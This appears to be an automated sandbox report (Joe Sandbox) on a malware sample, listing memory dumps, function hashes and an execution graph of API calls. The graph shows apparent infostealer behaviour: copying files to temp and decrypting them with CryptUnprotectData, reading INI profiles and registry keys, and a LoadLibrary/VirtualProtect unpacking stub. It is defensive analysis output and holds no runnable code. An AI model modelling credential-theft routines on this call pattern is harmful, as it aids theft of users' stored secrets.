                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1885482327-0
                                                                                                                                      • Opcode ID: de8874d48845eae4f1a19f9b5aa7761743db835d0add5313cf27f1d0da932191
                                                                                                                                      • Instruction ID: c9652ae7dc6dae044938ba6b82b21a86f007e17a080de909f10d87e24065c944
                                                                                                                                      • Opcode Fuzzy Hash: de8874d48845eae4f1a19f9b5aa7761743db835d0add5313cf27f1d0da932191
                                                                                                                                      • Instruction Fuzzy Hash: AEF04F72315245FADB106E949D41FAA3725AB44311F308177B613B80F6D53C8512BF2F

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 004032DC Relevance: .2, Instructions: 250COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ab996c8f6adeb1f811560704ce36dee006d49d645bc85f4b77d0051227f1598a
                                                                                                                                      • Instruction ID: c79f4b869008ced6ceb997418ae70e62909748bd184317ec6e10328692c13fab
                                                                                                                                      • Opcode Fuzzy Hash: ab996c8f6adeb1f811560704ce36dee006d49d645bc85f4b77d0051227f1598a
                                                                                                                                      • Instruction Fuzzy Hash: 76818B62409381AFC7138F3488955A27FA8AE5332271844FFC4D19B2E3E63D5B06D75A
                                                                                                                                      Function 004022A8 Relevance: .1, Instructions: 91COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e0bf8c7eaa3a37be3b3b29c24a77746cc94992b84e6c83370dbbf60a388f8e06
                                                                                                                                      • Instruction ID: 650921735e063de18cdef73246c5fdd7c9a102fb49419af3aad5742e618652a4
                                                                                                                                      • Opcode Fuzzy Hash: e0bf8c7eaa3a37be3b3b29c24a77746cc94992b84e6c83370dbbf60a388f8e06
                                                                                                                                      • Instruction Fuzzy Hash: 72217877A882D28ECF87C97888441C83BC2989F224B4CB1BBC860DB193F325505BC6E1
                                                                                                                                      Function 004022DE Relevance: .1, Instructions: 56COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1489969947.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1489834744.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490187939.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1490212058.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b3fe677114ba363ad11bc2741d66cbc5f11498b5d6a0ee6581245e02853eaab4
                                                                                                                                      • Instruction ID: 4d10188d7c84e24bf19bc5e9335db40da8dd412138308f7ff1bcf2cb767e1b42
                                                                                                                                      • Opcode Fuzzy Hash: b3fe677114ba363ad11bc2741d66cbc5f11498b5d6a0ee6581245e02853eaab4
                                                                                                                                      • Instruction Fuzzy Hash: 7C118C3698C2D28EDB47CE398C455C47F915C6B62074CA2BEC960CF2D7E228504BC3D1

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:3.5%
                                                                                                                                      Dynamic/Decrypted Code Coverage:47.6%
                                                                                                                                      Signature Coverage:20%
                                                                                                                                      Total number of Nodes:699
                                                                                                                                      Total number of Limit Nodes:81
                                                                                                                                      execution_graph 28447 7f807c 23 API calls 28448 7eb079 20 API calls 28452 82348f 27 API calls 28454 7e4c6d 17 API calls 28455 7ff86a 31 API calls 28456 822c9e 105 API calls 28554 80069d _allmul 28171 7e105d VirtualFree 28556 7e5e5a 28 API calls 28458 8013ca 87 API calls 28557 8013ca 89 API calls 28558 8012bb _allmul _allmul _allmul _alldvrm _allmul 28401 7e3c40 28402 7e1b6a 2 API calls 28401->28402 28403 7e3c50 28402->28403 28404 7e3dfa 28403->28404 28437 7e1000 GetProcessHeap RtlAllocateHeap 28403->28437 28406 7e3c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28407 834bec 89 API calls 28406->28407 28410 7e3c9a 28407->28410 28408 7e3dec DeleteFileW 28409 7e1011 3 API calls 28408->28409 28409->28404 28410->28408 28411 7e3de3 28410->28411 28438 7e1000 GetProcessHeap RtlAllocateHeap 28410->28438 28413 833848 76 API calls 28411->28413 28413->28408 28414 7e3cce 28439 8002ec 94 API calls 28414->28439 28416 7e3da8 28442 7ffb92 93 API calls 28416->28442 28417 7e1fa7 19 API calls 28429 7e3cd9 28417->28429 28419 7e3db1 lstrlen 28420 7e3ddc 28419->28420 28421 7e3db9 28419->28421 28423 7e1011 3 API calls 28420->28423 28443 7e1798 lstrlen 28421->28443 28423->28411 28424 7e3dc8 28444 7e1798 lstrlen 28424->28444 28426 7e3d2b lstrlen 28427 7e3d35 lstrlen 28426->28427 28426->28429 28427->28429 28428 7e3dd2 28445 7e1798 lstrlen 28428->28445 28429->28416 28429->28417 28429->28426 28440 7e1000 GetProcessHeap RtlAllocateHeap 28429->28440 28441 8002ec 94 API calls 28429->28441 28433 7e3d46 wsprintfA lstrlen 28434 7e3d83 lstrcat 28433->28434 28435 7e3d71 28433->28435 28436 7e1011 3 API calls 28434->28436 28435->28434 28436->28429 28437->28406 28438->28414 28439->28429 28440->28433 28441->28429 28442->28419 28443->28424 28444->28428 28445->28420 28459 7e4440 24 API calls 28460 7f943d 34 API calls 28462 8334ca 57 API calls 28562 80faca _allmul strcspn 27931 7ef433 27932 7ef445 27931->27932 27937 7f23b9 27932->27937 27935 7ef47c 27936 7ef490 27935->27936 27945 7ee206 58 API calls 27935->27945 27938 7f23d3 27937->27938 27942 7f2473 27937->27942 27940 7f2431 27938->27940 27949 7f3451 43 API calls 27938->27949 27940->27942 27946 7e63f7 27940->27946 27942->27935 27943 7f240f 27943->27940 27950 7f235a 17 API calls 27943->27950 27945->27936 27951 7ebafc 27946->27951 27947 7e6400 27947->27942 27949->27943 27950->27940 27962 7eb609 27951->27962 27953 7ebb14 27954 7ebb3f GetFileAttributesW 27953->27954 27955 7ebb5b 27953->27955 27956 7ebb25 DeleteFileW 27953->27956 27961 7ebb1a 27953->27961 27954->27953 27958 7ebb4b 27954->27958 27965 7ea1c6 18 API calls 27955->27965 27956->27953 27957 7ebb7d 27956->27957 27966 7ea2aa 17 API calls 27957->27966 27958->27955 27958->27957 27961->27947 27967 7ea08a 27962->27967 27964 7eb60f 27964->27953 27965->27961 27966->27961 27968 7ea0a4 27967->27968 27970 7ea0aa 27968->27970 27971 7e6a81 27968->27971 27970->27964 27972 7e6a8f 27971->27972 27973 7e6aa4 27972->27973 27974 7e6a95 memset 27972->27974 27973->27970 27974->27973 28466 7e482b 14 API calls 28570 80c6da 23 API calls 28469 8170de 24 API calls 28470 7e5818 _alldiv _allrem _allmul 28374 7ea40e 28375 7ea4a2 28374->28375 28379 7ea426 28374->28379 28377 7ea4cc ReadFile 28375->28377 28380 7ea524 28375->28380 28385 7ea501 28375->28385 28376 7ea469 memcpy 28376->28375 28377->28375 28377->28380 28378 7ea44a memcpy 28382 7ea45d 28378->28382 28379->28375 28379->28376 28379->28378 28388 7ea2aa 17 API calls 28380->28388 28383 7ea532 28383->28382 28384 7ea53e memset 28383->28384 28384->28382 28387 7ea1c6 18 API calls 28385->28387 28387->28382 28388->28383 28472 8013ca 89 API calls 28575 819ef6 114 API calls 28396 7e4406 28397 7e2e30 22 API calls 28396->28397 28398 7e4429 28397->28398 28399 7e2e30 22 API calls 28398->28399 28400 7e443a 28399->28400 28576 8013ca 88 API calls 28577 7eca01 _allmul _alldiv _allmul _alldiv 28473 819000 28 API calls 28475 825401 memset memcpy memcpy memset memcpy 27801 7e28f8 27802 7e2ac8 27801->27802 27803 7e2900 27801->27803 27833 833848 27802->27833 27836 7e1000 GetProcessHeap RtlAllocateHeap 27803->27836 27806 7e290e 27837 8002ec 94 API calls 27806->27837 27809 7e1011 3 API calls 27810 7e2adf 27809->27810 27812 7e2a98 lstrlen 27813 7e2aa4 27812->27813 27814 7e2ac1 27812->27814 27842 7e1798 lstrlen 27813->27842 27816 7e1011 3 API calls 27814->27816 27816->27802 27817 7e2ab1 27843 7e1798 lstrlen 27817->27843 27819 7e2ab9 27844 7e1798 lstrlen 27819->27844 27821 7e1fa7 19 API calls 27827 7e2919 27821->27827 27822 7e29da lstrlen 27823 7e29eb lstrlen 27822->27823 27822->27827 27823->27827 27826 7e2a8b 27841 7ffb92 93 API calls 27826->27841 27827->27821 27827->27822 27827->27826 27838 7e1000 GetProcessHeap RtlAllocateHeap 27827->27838 27839 7e2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27827->27839 27840 8002ec 94 API calls 27827->27840 27829 7e2a25 wsprintfA lstrlen 27830 7e2a6a lstrcat 27829->27830 27831 7e2a58 27829->27831 27832 7e1011 3 API calls 27830->27832 27831->27830 27832->27827 27845 8337cb 27833->27845 27836->27806 27837->27827 27838->27827 27839->27829 27840->27827 27841->27812 27842->27817 27843->27819 27844->27814 27846 8337d6 27845->27846 27848 7e2ad1 DeleteFileW 27845->27848 27857 7e95b5 17 API calls 27846->27857 27848->27809 27849 8337db 27850 8337df 27849->27850 27853 8337eb 27849->27853 27858 834da0 17 API calls 27850->27858 27852 833834 27860 833865 71 API calls 27852->27860 27853->27852 27855 83381f 27853->27855 27859 7e8795 22 API calls 27855->27859 27857->27849 27858->27848 27859->27848 27860->27848 28478 7e4cf5 memset 28579 800e0c 22 API calls 28480 7ef4ec 20 API calls 27975 7e9ee8 27976 7e9ef1 RtlFreeHeap 27975->27976 27979 7e9f1a 27975->27979 27977 7e9f02 27976->27977 27976->27979 27980 7e7f70 17 API calls 27977->27980 27980->27979 28580 80f21c 23 API calls 28483 81e024 93 API calls 28484 807c28 8 API calls 28486 80742e 24 API calls 28489 7f5cca 32 API calls 28491 7e6eb7 22 API calls 28492 7e5cc5 22 API calls 28493 806440 94 API calls 28584 7e96bc _alldiv _alldiv _alldiv _alldiv _allmul 28586 849238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28494 7f78b9 33 API calls 28588 8013ca 102 API calls 27894 7e2cb5 27895 7e2cbe 27894->27895 27896 7e1953 6 API calls 27895->27896 27897 7e2cc3 27896->27897 27898 7e2e17 27897->27898 27899 7e1953 6 API calls 27897->27899 27900 7e2cd9 27899->27900 27923 7e1000 GetProcessHeap RtlAllocateHeap 27900->27923 27902 7e2ce9 27924 7e1000 GetProcessHeap RtlAllocateHeap 27902->27924 27904 7e2cf9 27925 7e1b6a 27904->27925 27906 7e2d04 27907 7e2d0c GetPrivateProfileSectionNamesW 27906->27907 27912 7e2ded 27906->27912 27907->27912 27921 7e2d22 27907->27921 27908 7e1011 3 API calls 27909 7e2e02 27908->27909 27910 7e1011 3 API calls 27909->27910 27913 7e2e09 27910->27913 27911 7e2d3f StrStrIW 27914 7e2dd7 lstrlenW 27911->27914 27915 7e2d53 GetPrivateProfileStringW 27911->27915 27912->27908 27916 7e1011 3 API calls 27913->27916 27914->27912 27914->27921 27915->27914 27917 7e2d72 GetPrivateProfileIntW 27915->27917 27918 7e2e10 27916->27918 27917->27921 27919 7e1011 3 API calls 27918->27919 27919->27898 27920 7e1953 6 API calls 27920->27921 27921->27911 27921->27912 27921->27914 27921->27920 27922 7e1011 3 API calls 27921->27922 27922->27921 27923->27902 27924->27904 27926 7e1b6f 27925->27926 27927 7e1b99 27925->27927 27926->27927 27928 7e1b76 CreateFileW 27926->27928 27927->27906 27929 7e1b8d CloseHandle 27928->27929 27930 7e1b95 27928->27930 27929->27930 27930->27906 28495 7e6eb7 24 API calls 28496 7e48b1 22 API calls 28497 827452 19 API calls 28500 7fb0aa 84 API calls 27981 7e9ea7 RtlAllocateHeap 27982 7e9ed9 27981->27982 27983 7e9ec1 27981->27983 27985 7e7f70 17 API calls 27983->27985 27985->27982 28501 7fb8a6 90 API calls 27986 7e24a4 27989 7e2198 RtlZeroMemory GetVersionExW 27986->27989 27990 7e21cb LoadLibraryW 27989->27990 27992 7e21fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27990->27992 27993 7e249b 27990->27993 27994 7e2492 FreeLibrary 27992->27994 28002 7e2244 27992->28002 27994->27993 27995 7e247b 27995->27994 27996 7e2365 RtlCompareMemory 27996->28002 27997 7e22e1 RtlCompareMemory 27997->28002 27998 7e1953 6 API calls 27998->28002 27999 7e23f8 StrStrIW 27999->28002 28000 7e1011 GetProcessHeap RtlFreeHeap VirtualQuery 28000->28002 28001 7e17c0 9 API calls 28001->28002 28002->27994 28002->27995 28002->27996 28002->27997 28002->27998 28002->27999 28002->28000 28002->28001 28003 7e2ea5 25 API calls 28592 7e56a2 _allrem 28594 7e629a 23 API calls 28223 7e3098 28224 7e1b6a 2 API calls 28223->28224 28226 7e30af 28224->28226 28225 7e33a9 28226->28225 28247 7e1000 GetProcessHeap RtlAllocateHeap 28226->28247 28228 7e30ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28248 834bec 28228->28248 28230 7e339b DeleteFileW 28231 7e1011 3 API calls 28230->28231 28231->28225 28232 7e3126 28232->28230 28233 7e3392 28232->28233 28259 8002ec 94 API calls 28232->28259 28235 833848 76 API calls 28233->28235 28235->28230 28236 7e3381 28262 7ffb92 93 API calls 28236->28262 28239 7e319c RtlCompareMemory 28240 7e32cd CryptUnprotectData 28239->28240 28246 7e3155 28239->28246 28240->28246 28241 7e31d0 RtlZeroMemory 28260 7e1000 GetProcessHeap RtlAllocateHeap 28241->28260 28243 7e1fa7 19 API calls 28243->28246 28244 7e1011 3 API calls 28244->28246 28245 7e1798 lstrlen 28245->28246 28246->28236 28246->28239 28246->28240 28246->28241 28246->28243 28246->28244 28246->28245 28261 8002ec 94 API calls 28246->28261 28247->28228 28249 83307c 17 API calls 28248->28249 28250 834c01 28249->28250 28251 834c44 28250->28251 28263 7fc54d memset 28250->28263 28251->28232 28253 834c18 28264 7fc871 21 API calls 28253->28264 28255 834c2a 28265 7fc518 19 API calls 28255->28265 28257 834c33 28257->28251 28266 83486f 89 API calls 28257->28266 28259->28246 28260->28246 28261->28246 28262->28233 28263->28253 28264->28255 28265->28257 28266->28251 28503 822864 25 API calls 28596 7f6698 30 API calls 28598 813e6b 20 API calls 28599 800670 _allmul _allmul _allmul _alldvrm 28602 7f0284 39 API calls 28510 83507d 24 API calls 28511 7fc97b memcpy 27861 7e2f77 27866 7e2e30 StrStrIW 27861->27866 27864 7e2e30 22 API calls 27865 7e2fab 27864->27865 27867 7e2ebc 27866->27867 27868 7e2e57 27866->27868 27892 7e1000 GetProcessHeap RtlAllocateHeap 27867->27892 27869 7e19e5 9 API calls 27868->27869 27871 7e2e68 27869->27871 27871->27867 27893 7e1bc5 10 API calls 27871->27893 27872 7e2ed0 RegOpenKeyExW 27873 7e2f68 27872->27873 27890 7e2eee 27872->27890 27875 7e1011 3 API calls 27873->27875 27874 7e2f50 RegEnumKeyExW 27877 7e2f5e RegCloseKey 27874->27877 27874->27890 27878 7e2f6f 27875->27878 27877->27873 27878->27864 27879 7e2e75 27881 7e2eb5 27879->27881 27882 7e1afe 10 API calls 27879->27882 27880 7e1953 6 API calls 27880->27890 27883 7e1011 3 API calls 27881->27883 27884 7e2e83 27882->27884 27883->27867 27886 7e2e91 27884->27886 27887 7e199d 9 API calls 27884->27887 27885 7e199d 9 API calls 27885->27890 27889 7e1011 3 API calls 27886->27889 27887->27886 27888 7e2e30 18 API calls 27888->27890 27889->27881 27890->27874 27890->27880 27890->27885 27890->27888 27891 7e1011 3 API calls 27890->27891 27891->27890 27892->27872 27893->27879 28513 807d8b _allrem memcpy 28514 7fa16f 33 API calls 28605 8013ca 88 API calls 28606 7eab68 22 API calls 28516 7ea558 18 API calls 28608 808ba6 7 API calls 28609 8253ad memset memcpy memset memcpy 28610 7ff74d 18 API calls 28611 8233b7 27 API calls 28519 809dbc 25 API calls 28612 8013ca 89 API calls 28614 7f0f3e 60 API calls 28615 7f7b3d 18 API calls 28616 8173c4 22 API calls 28618 8013ca 89 API calls 28520 7f9534 39 API calls 28521 833dc8 24 API calls 28621 7fff32 21 API calls 28623 7ecb2a _allmul _allmul 28522 7f0128 36 API calls 28524 7e9925 18 API calls 28626 807be1 29 API calls 28525 7f84a7 30 API calls 28526 8355eb IsProcessorFeaturePresent 28286 7e3717 28287 7e1b6a 2 API calls 28286->28287 28289 7e372e 28287->28289 28288 7e3c23 28289->28288 28336 7e1000 GetProcessHeap RtlAllocateHeap 28289->28336 28291 7e376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28292 7e379e 28291->28292 28293 7e37a8 28291->28293 28337 7e349b 31 API calls 28292->28337 28295 834bec 89 API calls 28293->28295 28298 7e37b3 28295->28298 28296 7e3c15 DeleteFileW 28297 7e1011 3 API calls 28296->28297 28297->28288 28298->28296 28299 7e3c0c 28298->28299 28338 7e1000 GetProcessHeap RtlAllocateHeap 28298->28338 28300 833848 76 API calls 28299->28300 28300->28296 28302 7e37e3 28339 8002ec 94 API calls 28302->28339 28304 7e3bcc 28344 7ffb92 93 API calls 28304->28344 28306 7e3bd9 lstrlen 28307 7e3c05 28306->28307 28308 7e3be5 28306->28308 28309 7e1011 3 API calls 28307->28309 28345 7e1798 lstrlen 28308->28345 28309->28299 28311 7e3a37 CryptUnprotectData 28315 7e37ee 28311->28315 28312 7e3833 RtlCompareMemory 28312->28311 28312->28315 28314 7e3bf3 28346 7e1798 lstrlen 28314->28346 28315->28304 28315->28311 28315->28312 28319 7e3867 RtlZeroMemory 28315->28319 28321 7e1fa7 19 API calls 28315->28321 28322 7e1011 3 API calls 28315->28322 28323 7e3b0f lstrlen 28315->28323 28325 7e1000 GetProcessHeap RtlAllocateHeap 28315->28325 28326 7e3987 lstrlen 28315->28326 28330 7e3ba3 lstrcat 28315->28330 28341 7e2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28315->28341 28342 7e2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28315->28342 28343 8002ec 94 API calls 28315->28343 28317 7e3bfc 28347 7e1798 lstrlen 28317->28347 28340 7e1000 GetProcessHeap RtlAllocateHeap 28319->28340 28321->28315 28322->28315 28323->28315 28324 7e3b21 lstrlen 28323->28324 28324->28315 28325->28315 28326->28315 28329 7e3999 lstrlen 28326->28329 28328 7e3b66 wsprintfA lstrlen 28328->28315 28328->28330 28329->28315 28330->28315 28332 7e39de wsprintfA lstrlen 28333 7e3a0d 28332->28333 28334 7e3a1b lstrcat 28332->28334 28333->28334 28335 7e1011 3 API calls 28334->28335 28335->28315 28336->28291 28337->28293 28338->28302 28339->28315 28340->28315 28341->28332 28342->28328 28343->28315 28344->28306 28345->28314 28346->28317 28347->28307 28348 7e2b15 28349 7e1953 6 API calls 28348->28349 28350 7e2b1f FindFirstFileW 28349->28350 28352 7e2c5c 28350->28352 28371 7e2b4e 28350->28371 28353 7e1011 3 API calls 28352->28353 28355 7e2c63 28353->28355 28354 7e2b59 lstrcmpiW 28357 7e2c3d FindNextFileW 28354->28357 28358 7e2b71 lstrcmpiW 28354->28358 28359 7e1011 3 API calls 28355->28359 28356 7e1953 6 API calls 28356->28371 28360 7e2c51 FindClose 28357->28360 28357->28371 28358->28357 28358->28371 28361 7e2c6a 28359->28361 28360->28352 28362 7e199d 9 API calls 28364 7e2bdf StrStrIW 28362->28364 28363 7e19b4 lstrlenW 28363->28371 28365 7e2c10 StrStrIW 28364->28365 28368 7e2bf1 28364->28368 28365->28368 28366 7e1cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 28366->28368 28367 7e1011 3 API calls 28367->28357 28368->28365 28368->28366 28368->28367 28373 7e278e 41 API calls 28368->28373 28370 7e199d 9 API calls 28370->28371 28371->28354 28371->28356 28371->28362 28371->28363 28371->28370 28372 7e1011 3 API calls 28371->28372 28372->28371 28373->28365 28628 8013ca 72 API calls 27701 849304 27702 849344 27701->27702 27703 8494da LoadLibraryA 27702->27703 27707 84951f VirtualProtect VirtualProtect 27702->27707 27708 849584 27702->27708 27704 8494f1 27703->27704 27704->27702 27706 849503 GetProcAddress 27704->27706 27706->27704 27709 849519 27706->27709 27707->27708 27708->27708 27710 7e47fa 27717 7e479c 27710->27717 27713 7e479c 23 API calls 27714 7e4813 27713->27714 27715 7e479c 23 API calls 27714->27715 27716 7e481f 27715->27716 27726 7e1afe 27717->27726 27720 7e47f1 27720->27713 27722 7e47bf 27723 7e47ea 27722->27723 27739 7e1d4a 27722->27739 27767 7e1011 27723->27767 27772 7e1000 GetProcessHeap RtlAllocateHeap 27726->27772 27728 7e1b0d SHGetFolderPathW 27729 7e1b20 27728->27729 27733 7e1b63 27728->27733 27730 7e1011 3 API calls 27729->27730 27731 7e1b28 27730->27731 27731->27733 27773 7e19e5 27731->27773 27733->27720 27734 7e199d 27733->27734 27788 7e1953 27734->27788 27736 7e19a6 27737 7e1011 3 API calls 27736->27737 27738 7e19af 27737->27738 27738->27722 27740 7e1eb4 27739->27740 27741 7e1d62 27739->27741 27740->27722 27741->27740 27794 7e19b4 27741->27794 27744 7e1d8b 27747 7e1953 6 API calls 27744->27747 27745 7e1d79 27746 7e1953 6 API calls 27745->27746 27748 7e1d83 27746->27748 27747->27748 27748->27740 27749 7e1da3 FindFirstFileW 27748->27749 27750 7e1ead 27749->27750 27757 7e1dba 27749->27757 27751 7e1011 3 API calls 27750->27751 27751->27740 27752 7e1dc5 lstrcmpiW 27754 7e1e8e FindNextFileW 27752->27754 27755 7e1ddd lstrcmpiW 27752->27755 27753 7e1953 6 API calls 27753->27757 27756 7e1ea2 FindClose 27754->27756 27754->27757 27755->27754 27764 7e1df5 27755->27764 27756->27750 27757->27752 27757->27753 27759 7e199d 9 API calls 27757->27759 27758 7e19b4 lstrlenW 27758->27764 27760 7e1e54 lstrcmpiW 27759->27760 27760->27764 27762 7e1011 3 API calls 27762->27754 27763 7e1953 6 API calls 27763->27764 27764->27758 27764->27762 27764->27763 27765 7e199d 9 API calls 27764->27765 27766 7e1d4a 12 API calls 27764->27766 27798 7e1cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27764->27798 27765->27764 27766->27764 27799 7e1162 VirtualQuery 27767->27799 27770 7e102d 27770->27720 27771 7e101d GetProcessHeap RtlFreeHeap 27771->27770 27772->27728 27774 7e19fa RegOpenKeyExW 27773->27774 27775 7e19f7 27773->27775 27776 7e1a28 RegQueryValueExW 27774->27776 27777 7e1aa2 27774->27777 27775->27774 27779 7e1a94 RegCloseKey 27776->27779 27781 7e1a46 27776->27781 27778 7e1ab9 27777->27778 27780 7e19e5 5 API calls 27777->27780 27778->27731 27779->27777 27779->27778 27780->27778 27781->27779 27787 7e1000 GetProcessHeap RtlAllocateHeap 27781->27787 27783 7e1a61 RegQueryValueExW 27784 7e1a7f 27783->27784 27785 7e1a8b 27783->27785 27784->27779 27786 7e1011 3 API calls 27785->27786 27786->27784 27787->27783 27789 7e1964 lstrlenW lstrlenW 27788->27789 27793 7e1000 GetProcessHeap RtlAllocateHeap 27789->27793 27792 7e1986 lstrcatW lstrcatW 27792->27736 27793->27792 27795 7e19bc 27794->27795 27797 7e19d4 27794->27797 27796 7e19c3 lstrlenW 27795->27796 27795->27797 27796->27797 27797->27744 27797->27745 27798->27764 27800 7e1019 27799->27800 27800->27770 27800->27771 28633 816f06 24 API calls 28634 805f08 102 API calls 28528 7ed1f7 memset _allmul _allmul 28530 7e49f1 13 API calls 28635 7f9ff0 32 API calls 28531 7ec9ea _allmul _alldiv 28636 806b14 memset memcpy _allmul 28535 7e99e1 strncmp 28639 82c322 27 API calls 28172 7e15dd 28173 7e15f3 lstrlen 28172->28173 28174 7e1600 28172->28174 28173->28174 28183 7e1000 GetProcessHeap RtlAllocateHeap 28174->28183 28176 7e1608 lstrcat 28177 7e163d lstrcat 28176->28177 28178 7e1644 28176->28178 28177->28178 28184 7e1333 28178->28184 28181 7e1011 3 API calls 28182 7e1667 28181->28182 28183->28176 28208 7e1000 GetProcessHeap RtlAllocateHeap 28184->28208 28186 7e1357 28209 7e106c lstrlen MultiByteToWideChar 28186->28209 28188 7e1366 28210 7e12a3 RtlZeroMemory 28188->28210 28191 7e13b8 RtlZeroMemory 28195 7e13ed 28191->28195 28192 7e1011 3 API calls 28193 7e15d2 28192->28193 28193->28181 28194 7e15b5 28194->28192 28195->28194 28212 7e1000 GetProcessHeap RtlAllocateHeap 28195->28212 28197 7e14a7 wsprintfW 28198 7e14c9 28197->28198 28207 7e15a1 28198->28207 28213 7e1000 GetProcessHeap RtlAllocateHeap 28198->28213 28199 7e1011 3 API calls 28199->28194 28201 7e1533 28202 7e159a 28201->28202 28203 7e1585 28201->28203 28205 7e1011 3 API calls 28202->28205 28214 7e104c VirtualAlloc 28203->28214 28205->28207 28206 7e158a RtlMoveMemory 28206->28202 28207->28199 28208->28186 28209->28188 28211 7e12c5 28210->28211 28211->28191 28211->28194 28212->28197 28213->28201 28214->28206 28215 7e63dd 28217 7eb87b 21 API calls 28215->28217 28216 7e63f4 28217->28216 28267 7e43d9 28274 7e4317 _alloca_probe RegOpenKeyW 28267->28274 28270 7e4317 25 API calls 28271 7e43f5 28270->28271 28272 7e4317 25 API calls 28271->28272 28273 7e4403 28272->28273 28275 7e43cf 28274->28275 28276 7e4343 RegEnumKeyExW 28274->28276 28275->28270 28277 7e43c4 RegCloseKey 28276->28277 28279 7e436d 28276->28279 28277->28275 28278 7e1953 6 API calls 28278->28279 28279->28278 28280 7e199d 9 API calls 28279->28280 28282 7e1011 3 API calls 28279->28282 28285 7e418a 16 API calls 28279->28285 28280->28279 28283 7e439b RegEnumKeyExW 28282->28283 28283->28279 28284 7e43c3 28283->28284 28284->28277 28285->28279 28640 7eebd9 37 API calls 28641 81072d 19 API calls 28540 80f130 22 API calls 28389 7e9fc8 28390 7e9fd3 28389->28390 28392 7e9fd8 28389->28392 28391 7e9ff4 HeapCreate 28391->28390 28393 7ea004 28391->28393 28392->28390 28392->28391 28395 7e7f70 17 API calls 28393->28395 28395->28390 28645 806340 92 API calls 28541 80e141 18 API calls 28542 80e558 22 API calls 28543 7f11a0 43 API calls 28004 7e639e 28008 7eb1e5 28004->28008 28028 7eb1e3 28004->28028 28005 7e63b2 28009 7eb20d 28008->28009 28010 7eb214 28008->28010 28064 7eaeea 28009->28064 28011 7eb233 28010->28011 28015 7eb28f 28010->28015 28082 7eae65 28010->28082 28011->28015 28048 7ea7ae 28011->28048 28015->28005 28016 7eb26d 28088 7ea1c6 18 API calls 28016->28088 28017 7eb2d6 28061 7e6a5a 28017->28061 28023 7eb310 CreateFileMappingW 28024 7eb37e 28023->28024 28025 7eb32b MapViewOfFile 28023->28025 28089 7ea1c6 18 API calls 28024->28089 28025->28024 28026 7eb2e8 28025->28026 28026->28015 28026->28023 28029 7eb1e5 28028->28029 28030 7eaeea 27 API calls 28029->28030 28033 7eb214 